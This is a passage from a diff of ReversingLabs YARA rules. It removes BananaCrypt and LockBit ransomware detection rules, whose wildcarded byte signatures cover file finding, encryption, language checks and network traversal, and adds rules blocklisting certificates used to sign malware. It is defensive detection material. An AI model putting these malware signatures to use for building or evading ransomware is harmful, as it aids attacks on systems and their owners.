-            15 ?? ?? ?? ?? 83 C4 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 EB ?? 56 FF 15 ?? ?? ??
-            ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 8B
-            4D ?? 5F 5E 33 CD 33 C0 5B E8 ?? ?? ?? ?? C9 C2
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( $generate_key ) and ( all of ( $encrypt_files_p* ) ) and ( all of ( $remote_connection_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Yu Bao" and pe.signatures [ i ] . serial == "32:bc:29:9f:06:94:c1:9e:c2:1e:71:26:5b:1d:7e:17" and 1474416000 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Bananacrypt : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_7B75C6B0A09Afdb9787F6Dff75Ae7844 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects BananaCrypt ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "9e47d094-d7fc-57dd-826c-5321d0219273"
-		date = "2020-09-14"
-		modified = "2020-09-14"
+		id = "0b34c7ce-fa75-5340-a473-fa87fab93b86"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.BananaCrypt.yara#L1-L103"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "6bde4430e438947b0d7f10c4de11216929ec03af81b3d74f8b7bb8ed134d08d2"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L13764-L13780"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "8fd125a526b3433fbb8a5c6fa74ce0b0e2de8ff789880c355625d4140cd902a2"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "BananaCrypt"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$encrypt_files_p1 = {
-            55 89 E5 57 56 53 89 C3 81 EC ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 8B 55 ?? 89 8D ?? ?? ??
-            ?? 85 D2 74 ?? 8B 45 ?? 85 C0 0F 85 ?? ?? ?? ?? 31 F6 0F B6 13 84 D2 0F 84 ?? ?? ??
-            ?? 8D 43 ?? 88 95 ?? ?? ?? ?? 8D 8B ?? ?? ?? ?? 8D BD ?? ?? ?? ?? EB ?? 83 C0 ?? 83
-            C7 ?? 88 57 ?? 39 C1 74 ?? 0F B6 10 84 D2 75 ?? 89 BD ?? ?? ?? ?? 8B 85 ?? ?? ?? ??
-            C6 00 ?? 89 1C 24 E8 ?? ?? ?? ?? 85 C0 89 85 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 89 F0 84
-            C0 0F 85 ?? ?? ?? ?? 8D 5D ?? 8D 76 ?? 8D BC 27 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 04
-            24 E8 ?? ?? ?? ?? 85 C0 89 C6 0F 84 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8D BD ?? ?? ?? ??
-            39 F9 89 C8 76 ?? 0F B6 41 ?? 89 CF 3C ?? 0F 95 C1 3C ?? 0F 95 C2 84 D1 0F 84 ?? ??
-            ?? ?? 3C ?? 0F 84 ?? ?? ?? ?? 8D 47 ?? C6 07 ?? 8D 7E ?? 39 D8 89 BD ?? ?? ?? ?? 73
-            ?? 0F B6 56 ?? 84 D2 74 ?? 89 F9 8B BD ?? ?? ?? ?? EB ?? 90 0F B6 11 84 D2 74 ?? 83
-            C0 ?? 83 C1 ?? 88 50 ?? 39 D8 75 ?? 89 BD ?? ?? ?? ?? C6 00 ?? 8D 85 ?? ?? ?? ?? 31
-            FF 89 04 24 E8 ?? ?? ?? ?? 85 C0 89 C2 74 ?? 80 38 ?? 74 ?? 8B 85 ?? ?? ?? ?? 66 90
-            83 C7 ?? 80 3C 3A ?? 75 ?? 89 85 ?? ?? ?? ?? 89 54 24 ?? C7 04 24 ?? ?? ?? ?? 89 95
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 46 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 3D ?? ?? ?? ?? 8B 95
-            ?? ?? ?? ?? 74 ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 7C 24 ?? 89 14 24 89
-        }
-		$encrypt_files_p2 = {
-            44 24 ?? 8B 85 ?? ?? ?? ?? 89 44 24 ?? E8 ?? ?? ?? ?? 84 C0 0F 84 ?? ?? ?? ?? C7 04
-            24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 C6 8D 85 ?? ?? ?? ?? 89 F1 89 04 24 E8 ?? ?? ?? ??
-            83 EC ?? 89 F1 E8 ?? ?? ?? ?? 84 C0 0F 85 ?? ?? ?? ?? 89 F1 E8 ?? ?? ?? ?? 89 C7 8D
-            40 ?? 83 F8 ?? 76 ?? 89 F1 83 05 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 F1 E8 ?? ?? ?? ??
-            89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 3C 24 89 44 24 ?? E8 ?? ?? ?? ?? 89 F1 E8 ??
-            ?? ?? ?? 89 F1 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? 89 44 24 ?? E8
-            ?? ?? ?? ?? 89 F1 E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 34 24 E8 ?? ?? ?? ?? 89
-            F1 E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 34 24 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B
-            B5 ?? ?? ?? ?? BF ?? ?? ?? ?? B9 ?? ?? ?? ?? F3 A6 0F 84 ?? ?? ?? ?? 8B B5 ?? ?? ??
-            ?? BF ?? ?? ?? ?? B9 ?? ?? ?? ?? F3 A6 0F 84 ?? ?? ?? ?? 8B 45 ?? 8B 8D ?? ?? ?? ??
-            8B 95 ?? ?? ?? ?? 89 44 24 ?? 8B 45 ?? 89 04 24 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? E9
-            ?? ?? ?? ?? 8D 74 26 ?? 8B 85 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 04 24
-            E8 ?? ?? ?? ?? 8D 65 ?? B8 ?? ?? ?? ?? 5B 5E 5F 5D C3 8B 45 ?? 89 1C 24 89 44 24 ??
-            8B 45 ?? 89 44 24 ?? E8 ?? ?? ?? ?? 89 C6 E9 ?? ?? ?? ?? 8D 65 ?? 31 C0 5B 5E 5F 5D
-            C3 8D 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? E9
-        }
-		$find_files_p1 = {
-            8D 4C 24 ?? 83 E4 ?? FF 71 ?? 55 89 E5 57 56 53 51 81 EC ?? ?? ?? ?? 8B 31 8B 79 ??
-            E8 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 FE ?? 7E ?? 89 74 24 ?? C7 04
-            24 ?? ?? ?? ?? 31 DB E8 ?? ?? ?? ?? 8B 04 9F 89 5C 24 ?? 83 C3 ?? C7 04 24 ?? ?? ??
-            ?? 89 44 24 ?? E8 ?? ?? ?? ?? 39 DE 75 ?? C7 44 24 ?? ?? ?? ?? ?? 8B 47 ?? 89 04 24
-            E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 89
-            44 24 ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? BE ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D BD ??
-            ?? ?? ?? F3 A5 8D 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ??
-            ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 89 04 24 C7 85
-        }
-		$find_files_p2 = {
-            8B 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? 89 C3 E8 ?? ?? ?? ??
-            8D 44 03 ?? 89 04 24 E8 ?? ?? ?? ?? 89 C3 8B 85 ?? ?? ?? ?? 89 1C 24 89 44 24 ?? E8
-            ?? ?? ?? ?? 89 DA 8B 0A 83 C2 ?? 8D 81 ?? ?? ?? ?? F7 D1 21 C8 25 ?? ?? ?? ?? 74 ??
-            A9 ?? ?? ?? ?? 74 ?? 89 C1 00 C1 83 DA ?? C7 02 ?? ?? ?? ?? C7 42 ?? ?? ?? ?? ?? C7
-            42 ?? ?? ?? ?? ?? C7 42 ?? ?? ?? ?? ?? C7 42 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 84 C0 74 ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 65 ?? 31 C0 59 5B 5E
-            5F 5D 8D 61 ?? C3 C1 E8 ?? 83 C2 ?? EB ?? 8D 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? B9 ??
-            ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8D BD ?? ?? ?? ?? BE ?? ?? ?? ?? 89 04 24 B8 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? B9 ?? ?? ?? ?? C7 44 24 ??
-            ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 29
-            F9 89 85 ?? ?? ?? ?? A1 ?? ?? ?? ?? 29 CE 81 C1 ?? ?? ?? ?? C1 E9 ?? 89 45 ?? F3
-        }
-		$find_files_p3 = {
-            A5 89 1C 24 E8 ?? ?? ?? ?? 84 C0 0F 84 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 24
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ??
-            ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 89 C6 74 ?? 89 44 24 ?? C7 44 24 ?? ??
-            ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 34 24 E8 ??
-            ?? ?? ?? 89 1C 24 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? 89 44 24 ?? E8
-            ?? ?? ?? ?? E9 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? C7 04
-            24 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? C7
-            44 24 ?? ?? ?? ?? ?? 89 1C 24 E8 ?? ?? ?? ?? 85 C0 89 C6 0F 84 ?? ?? ?? ?? 89 44 24
-            ?? 8D 85 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 04 24 E8 ??
-            ?? ?? ?? 89 34 24 E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7
-            44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? E9
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Yuanyuan Zhang" and pe.signatures [ i ] . serial == "7b:75:c6:b0:a0:9a:fd:b9:78:7f:6d:ff:75:ae:78:44" and 1476662400 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Lockbit : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_167Fd1295B3Bb102Dbb37292C838E7Cd : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects LockBit ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "9a6405dc-da1f-5426-a424-a73bceb1928c"
-		date = "2022-03-31"
-		modified = "2022-03-31"
+		id = "42cf5f07-4c43-567c-a517-42c898658ab8"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.LockBit.yara#L1-L282"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "030222bd659c7e0e03858fa062067b1483aca3b7973cce19a1e7cdbb48d4405c"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L13782-L13798"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "1cc7d441291fd9c4dc37320d411f94fb362523d47d37ab35c20b3ac9d4cd75cb"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "LockBit"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$enum_resources_v1 = {
-            55 8B EC 83 EC ?? 57 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 51 6A ?? 6A ?? 6A ?? C7 45 ??
-            ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? FF 75 ?? 6A ?? FF 15 ?? ?? ??
-            ?? 8B F8 89 7D ?? 85 FF 0F 84 ?? ?? ?? ?? 53 56 FF 75 ?? 6A ?? 57 E8 ?? ?? ?? ?? 83
-            C4 ?? 8D 45 ?? 50 57 8D 45 ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ??
-            33 DB 39 5D ?? 76 ?? 8B F7 0F 1F 80 ?? ?? ?? ?? F7 46 ?? ?? ?? ?? ?? 74 ?? 8B CE E8
-            ?? ?? ?? ?? 83 7F ?? ?? 74 ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B F8 83 C4 ?? 8B 45
-            ?? FF 70 ?? FF 15 ?? ?? ?? ?? 8D 04 45 ?? ?? ?? ?? 50 8B 45 ?? FF 70 ?? 57 E8 ?? ??
-            ?? ?? 83 C4 ?? 8D 45 ?? 50 6A ?? 57 68 ?? ?? ?? ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 8B
-            0D ?? ?? ?? ?? 89 04 8D ?? ?? ?? ?? F0 FF 05 ?? ?? ?? ?? 8B 7D ?? 43 83 C6 ?? 3B 5D
-            ?? 72 ?? E9 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 5E 5B 85 C0
-            75 ?? B8 ?? ?? ?? ?? 5F 8B E5 5D C3 33 C0 5F 8B E5 5D C3
-        }
-		$find_files_v1_1 = {
-            55 8B EC 81 EC ?? ?? ?? ?? 53 56 8B C1 C7 45 ?? ?? ?? ?? ?? 57 50 89 45 ?? 33 C9 8D
-            45 ?? C7 45 ?? ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 66 89 4D ?? 50 FF 15 ?? ?? ?? ?? 83
-            C4 ?? 8D 85 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 50 6A ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ??
-            ?? ?? 8B F8 89 7D ?? 83 FF ?? 0F 84 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 33 C0 8B 35 ?? ??
-            ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 89 45 ?? C7 45 ?? ?? ?? ?? ?? C7
-            45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 0F 1F 80 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D
-            45 ?? 50 FF D3 85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 45 ?? 50 FF D3 85 C0
-            0F 84 ?? ?? ?? ?? F6 85 ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 68 ?? ??
-            ?? ?? 50 FF D3 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF D3 85
-            C0 0F 84
-        }
-		$find_files_v1_2 = {
-            45 ?? 50 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? E8 ?? ??
-            ?? ?? E9 ?? ?? ?? ?? 33 C9 66 39 8D ?? ?? ?? ?? 74 ?? 8D 40 ?? 41 66 83 38 ?? 75 ??
-            83 F9 ?? 0F 8E ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B F0 56 68 ?? ??
-            ?? ?? FF D3 85 C0 0F 84 ?? ?? ?? ?? 56 68 ?? ?? ?? ?? FF D3 85 C0 0F 84 ?? ?? ?? ??
-            56 68 ?? ?? ?? ?? FF D3 85 C0 0F 84 ?? ?? ?? ?? 56 68 ?? ?? ?? ?? FF D3 85 C0 0F 84
-        }
-		$find_files_v1_3 = {
-            85 C0 0F 84 ?? ?? ?? ?? 56 68 ?? ?? ?? ?? FF D3 85 C0 0F 84 ?? ?? ?? ?? 56 68 ?? ??
-            ?? ?? FF D3 85 C0 0F 84 ?? ?? ?? ?? 56 68 ?? ?? ?? ?? FF D3 85 C0 0F 84 ?? ?? ?? ??
-            56 68 ?? ?? ?? ?? FF D3 85 C0 0F 84 ?? ?? ?? ?? 56 68 ?? ?? ?? ?? FF D3 85 C0 0F 84
-            ?? ?? ?? ?? 0F 28 05 ?? ?? ?? ?? 33 C9 0F 11 45 ?? C7 45 ?? ?? ?? ?? ?? 66 C7 45 ??
-            ?? ?? 66 90 8A 45 ?? 30 44 0D ?? 41 83 F9 ?? 72 ?? 33 C0 C6 45 ?? ?? 66 89 45 ?? 8D
-            45 ?? 50 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83
-            C4 ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 FF D3 85 C0 0F 84 ?? ?? ?? ?? 8D 85
-            ?? ?? ?? ?? 50 68 ?? ?? ?? ?? FF D3 85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68
-            ?? ?? ?? ?? FF D3 85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? FF D3
-            85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? FF D3 85 C0 0F 84 ?? ??
-            ?? ?? 8B 4D ?? 8D 95 ?? ?? ?? ?? 2B D1 0F B7 01 8D 49 ?? 66 89 44 11 ?? 66 85 C0 75
-            ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B F2 66 8B 02 83 C2 ??
-            66 85 C0 75 ?? 8D BD ?? ?? ?? ?? 2B D6 83 C7 ?? 0F 1F 40 ?? 66 8B 47 ?? 83 C7 ?? 66
-            85 C0 75 ?? 8B 85 ?? ?? ?? ?? 8B CA C1 E9 ?? F3 A5 8B CA 83 E1 ?? F3 A4 A8 ?? 75 ??
-            A8 ?? 74 ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8D 8D
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 7D ?? 8B 35 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 57 FF D6
-            83 F8 ?? 0F 84 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 75 ?? 57 FF 15 ?? ?? ?? ?? 5F
-            5E 5B 8B E5 5D C3
-        }
-		$encrypt_files_v1_1 = {
-            55 8B EC 81 EC ?? ?? ?? ?? 33 C0 C7 45 ?? ?? ?? ?? ?? 53 56 57 8B F9 C7 45 ?? ?? ??
-            ?? ?? 89 7D ?? 66 89 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 89 45 ?? C7
-            45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66
-            89 45 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85
-        }
-		$encrypt_files_v1_2 = {
-            C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 89 85 ?? ?? ?? ?? C7 85
-            ?? ?? ?? ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B F8 33 DB 89 7D ?? 33 F6 0F 1F 00 8B 84
-            B5 ?? ?? ?? ?? 85 C0 74 ?? 57 50 FF 15 ?? ?? ?? ?? 85 C0 B8 ?? ?? ?? ?? 0F 44 D8 46
-            81 FE ?? ?? ?? ?? 7C ?? 8B 7D ?? 33 C0 66 89 85 ?? ?? ?? ?? 66 89 85 ?? ?? ?? ?? 8D
-            85 ?? ?? ?? ?? 57 50 8D 85 ?? ?? ?? ?? 89 5D ?? 50 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7
-            85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ??
-            ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ??
-            ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? FF 15 ?? ?? ??
-            ?? 8B 1D ?? ?? ?? ?? 83 C4 ?? 33 F6 8D 85 ?? ?? ?? ?? 50 FF 75 ?? FF 15 ?? ?? ?? ??
-            85 C0 74 ?? 8D 85 ?? ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF D3 83 F8 ?? 75
-            ?? 8B CF E8 ?? ?? ?? ?? 83 F8 ?? 74 ?? 8B
-        }
-		$encrypt_files_v1_3 = {
-            CF E8 ?? ?? ?? ?? 83 F8 ?? 75 ?? 83 FE ?? 7D ?? 46 EB ?? 6A ?? 68 ?? ?? ?? ?? 6A ??
-            6A ?? 6A ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B D8 89 5D ?? 83
-            FB ?? 75 ?? 8B 1D ?? ?? ?? ?? EB ?? FF 35 ?? ?? ?? ?? 6A ?? FF 35 ?? ?? ?? ?? 53 FF
-            15 ?? ?? ?? ?? A3 ?? ?? ?? ?? 83 F8 ?? 75 ?? 53 FF 15 ?? ?? ?? ?? 33 C0 5F 5E 5B 8B
-            E5 5D C3 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B D8 83 C4 ?? 85 DB 75 ?? FF 75 ?? FF 15
-            ?? ?? ?? ?? 33 C0 5F 5E 5B 8B E5 5D C3 8B 45 ?? 8B 75 ?? 89 43 ?? 8D 43 ?? 50 56 C7
-            43 ?? ?? ?? ?? ?? C7 43 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 53 FF 15 ?? ??
-            ?? ?? 83 C4 ?? 56 FF 15 ?? ?? ?? ?? 33 C0 5F 5E 5B 8B E5 5D C3 8B 4B ?? 8B 43 ?? 85
-            C9 7F ?? 7C ?? 83 F8 ?? 72 ?? 83 E8 ?? C7 43 ?? ?? ?? ?? ?? 89 43 ?? 8B 43 ?? 83 D9
-            ?? 89 43 ?? 8B 43 ?? 89 43 ?? 8D 83 ?? ?? ?? ?? 6A ?? 50 89 4B ?? C7 43 ?? ?? ?? ??
-            ?? 89 73 ?? E8 ?? ?? ?? ?? 6A ?? 8D 83 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 53 6A ?? 6A ??
-            8D 73 ?? 56 FF 73 ?? FF 15 ?? ?? ?? ?? 89 45 ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 3D ??
-            ?? ?? ?? 74 ?? 56 8B 35 ?? ?? ?? ?? FF D6 83 C4 ?? 53 FF D6 83 C4 ?? FF 75 ?? FF 15
-            ?? ?? ?? ?? 8B 45 ?? 5F 5E 5B 8B E5 5D C3 F0 FF 05 ?? ?? ?? ?? 8B CF E8 ?? ?? ?? ??
-            B8 ?? ?? ?? ?? F0 0F C1 05 ?? ?? ?? ?? 40 3D ?? ?? ?? ?? 7E ?? 8B 35 ?? ?? ?? ?? 6A
-            ?? FF D6 83 3D ?? ?? ?? ?? ?? 7D ?? 5F 5E B8 ?? ?? ?? ?? 5B 8B E5 5D C3
-        }
-		$check_blacklisted_languages_v2 = {
-            FF D0 0F B7 C0 B9 2C 08 ?? ?? 66 3B C1 0F 84 ?? ?? ?? ?? B9 2C 04 ?? ?? 66 3B C1 74
-            ?? B9 2B 04 ?? ?? 66 3B C1 74 ?? B9 23 04 ?? ?? 66 3B C1 74 ?? B9 37 04 ?? ?? 66 3B
-            C1 74 ?? B9 3F 04 ?? ?? 66 3B C1 74 ?? B9 40 04 ?? ?? 66 3B C1 74 ?? B9 19 08 ?? ??
-            66 3B C1 74 ?? B9 19 04 ?? ?? 66 3B C1 74 ?? B9 28 04 ?? ?? 66 3B C1 74 ?? B9 42 04
-            ?? ?? 66 3B C1 74 ?? B9 43 08 ?? ?? 66 3B C1 74 ?? B9 43 04 ?? ?? 66 3B C1 74 ?? B9
-            22 04 ?? ?? 66 3B C1 0F 85 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 85 DB 0F 85 ?? ?? ?? ?? 64
-            A1 ?? ?? ?? ?? 8B 40 ?? 8B 40 ?? 8B 00 8B C8 89 45 ?? 8B D0 89 4D ?? 0F B7 59 ?? 33
-            FF 8B 71 ?? D1 EB C7 45 ?? ?? ?? ?? ?? 8D 04 5E 3B F0 0F 47 DF 85 DB 74 ?? 8A 0E 8D
-            76 ?? 0F BE D1 80 E9 ?? 8B C2 83 C8 ?? 80 F9 ?? 0F 47 C2 47 33 45 ?? 69 C0 ?? ?? ??
-            ?? 89 45 ?? 3B FB 75 ?? 3D ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B 4D ?? 8B 55 ?? 8B 01 8B
-            C8 89 4D ?? 3B C2 74 ?? 83 79 ?? ?? 75 ?? 33 DB 89 1D ?? ?? ?? ?? A1 ?? ?? ?? ?? 85
-            C0 0F 85 ?? ?? ?? ?? 85 DB 0F 84 ?? ?? ?? ?? 8B 43 ?? 8B 4C 18 ?? 8D 04 19 89 45 ??
-            3B C3 74 ?? 33 C9 89 4D ?? 39 48 ?? 74 ?? 8B 40 ?? 8B 55 ?? 03 C3 89 45 ?? 0F 1F 40
-            ?? 8B 30 BF ?? ?? ?? ?? 8A 04 1E 03 F3 46 84 C0 74 ?? 0F BE D0 8D 76 ?? 2C ?? 8B CA
-            83 C9 ?? 3C ?? 8A 46 ?? 0F 47 CA 33 CF 69 F9 ?? ?? ?? ?? 84 C0 75 ?? 8B 4D ?? 8B 55
-            ?? 81 FF ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B 45 ?? 41 83 C0 ?? 89 4D ?? 89 45 ?? 3B 4A
-            ?? 75 ?? 33 C0 A3 ?? ?? ?? ?? 6A ?? FF D0 5F 5E 5B 8B E5 5D C3
-        }
-		$create_net_host_trav_threads_v2 = {
-            55 8B EC 83 E4 ?? 81 EC ?? ?? ?? ?? 53 56 57 6A ?? 6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ??
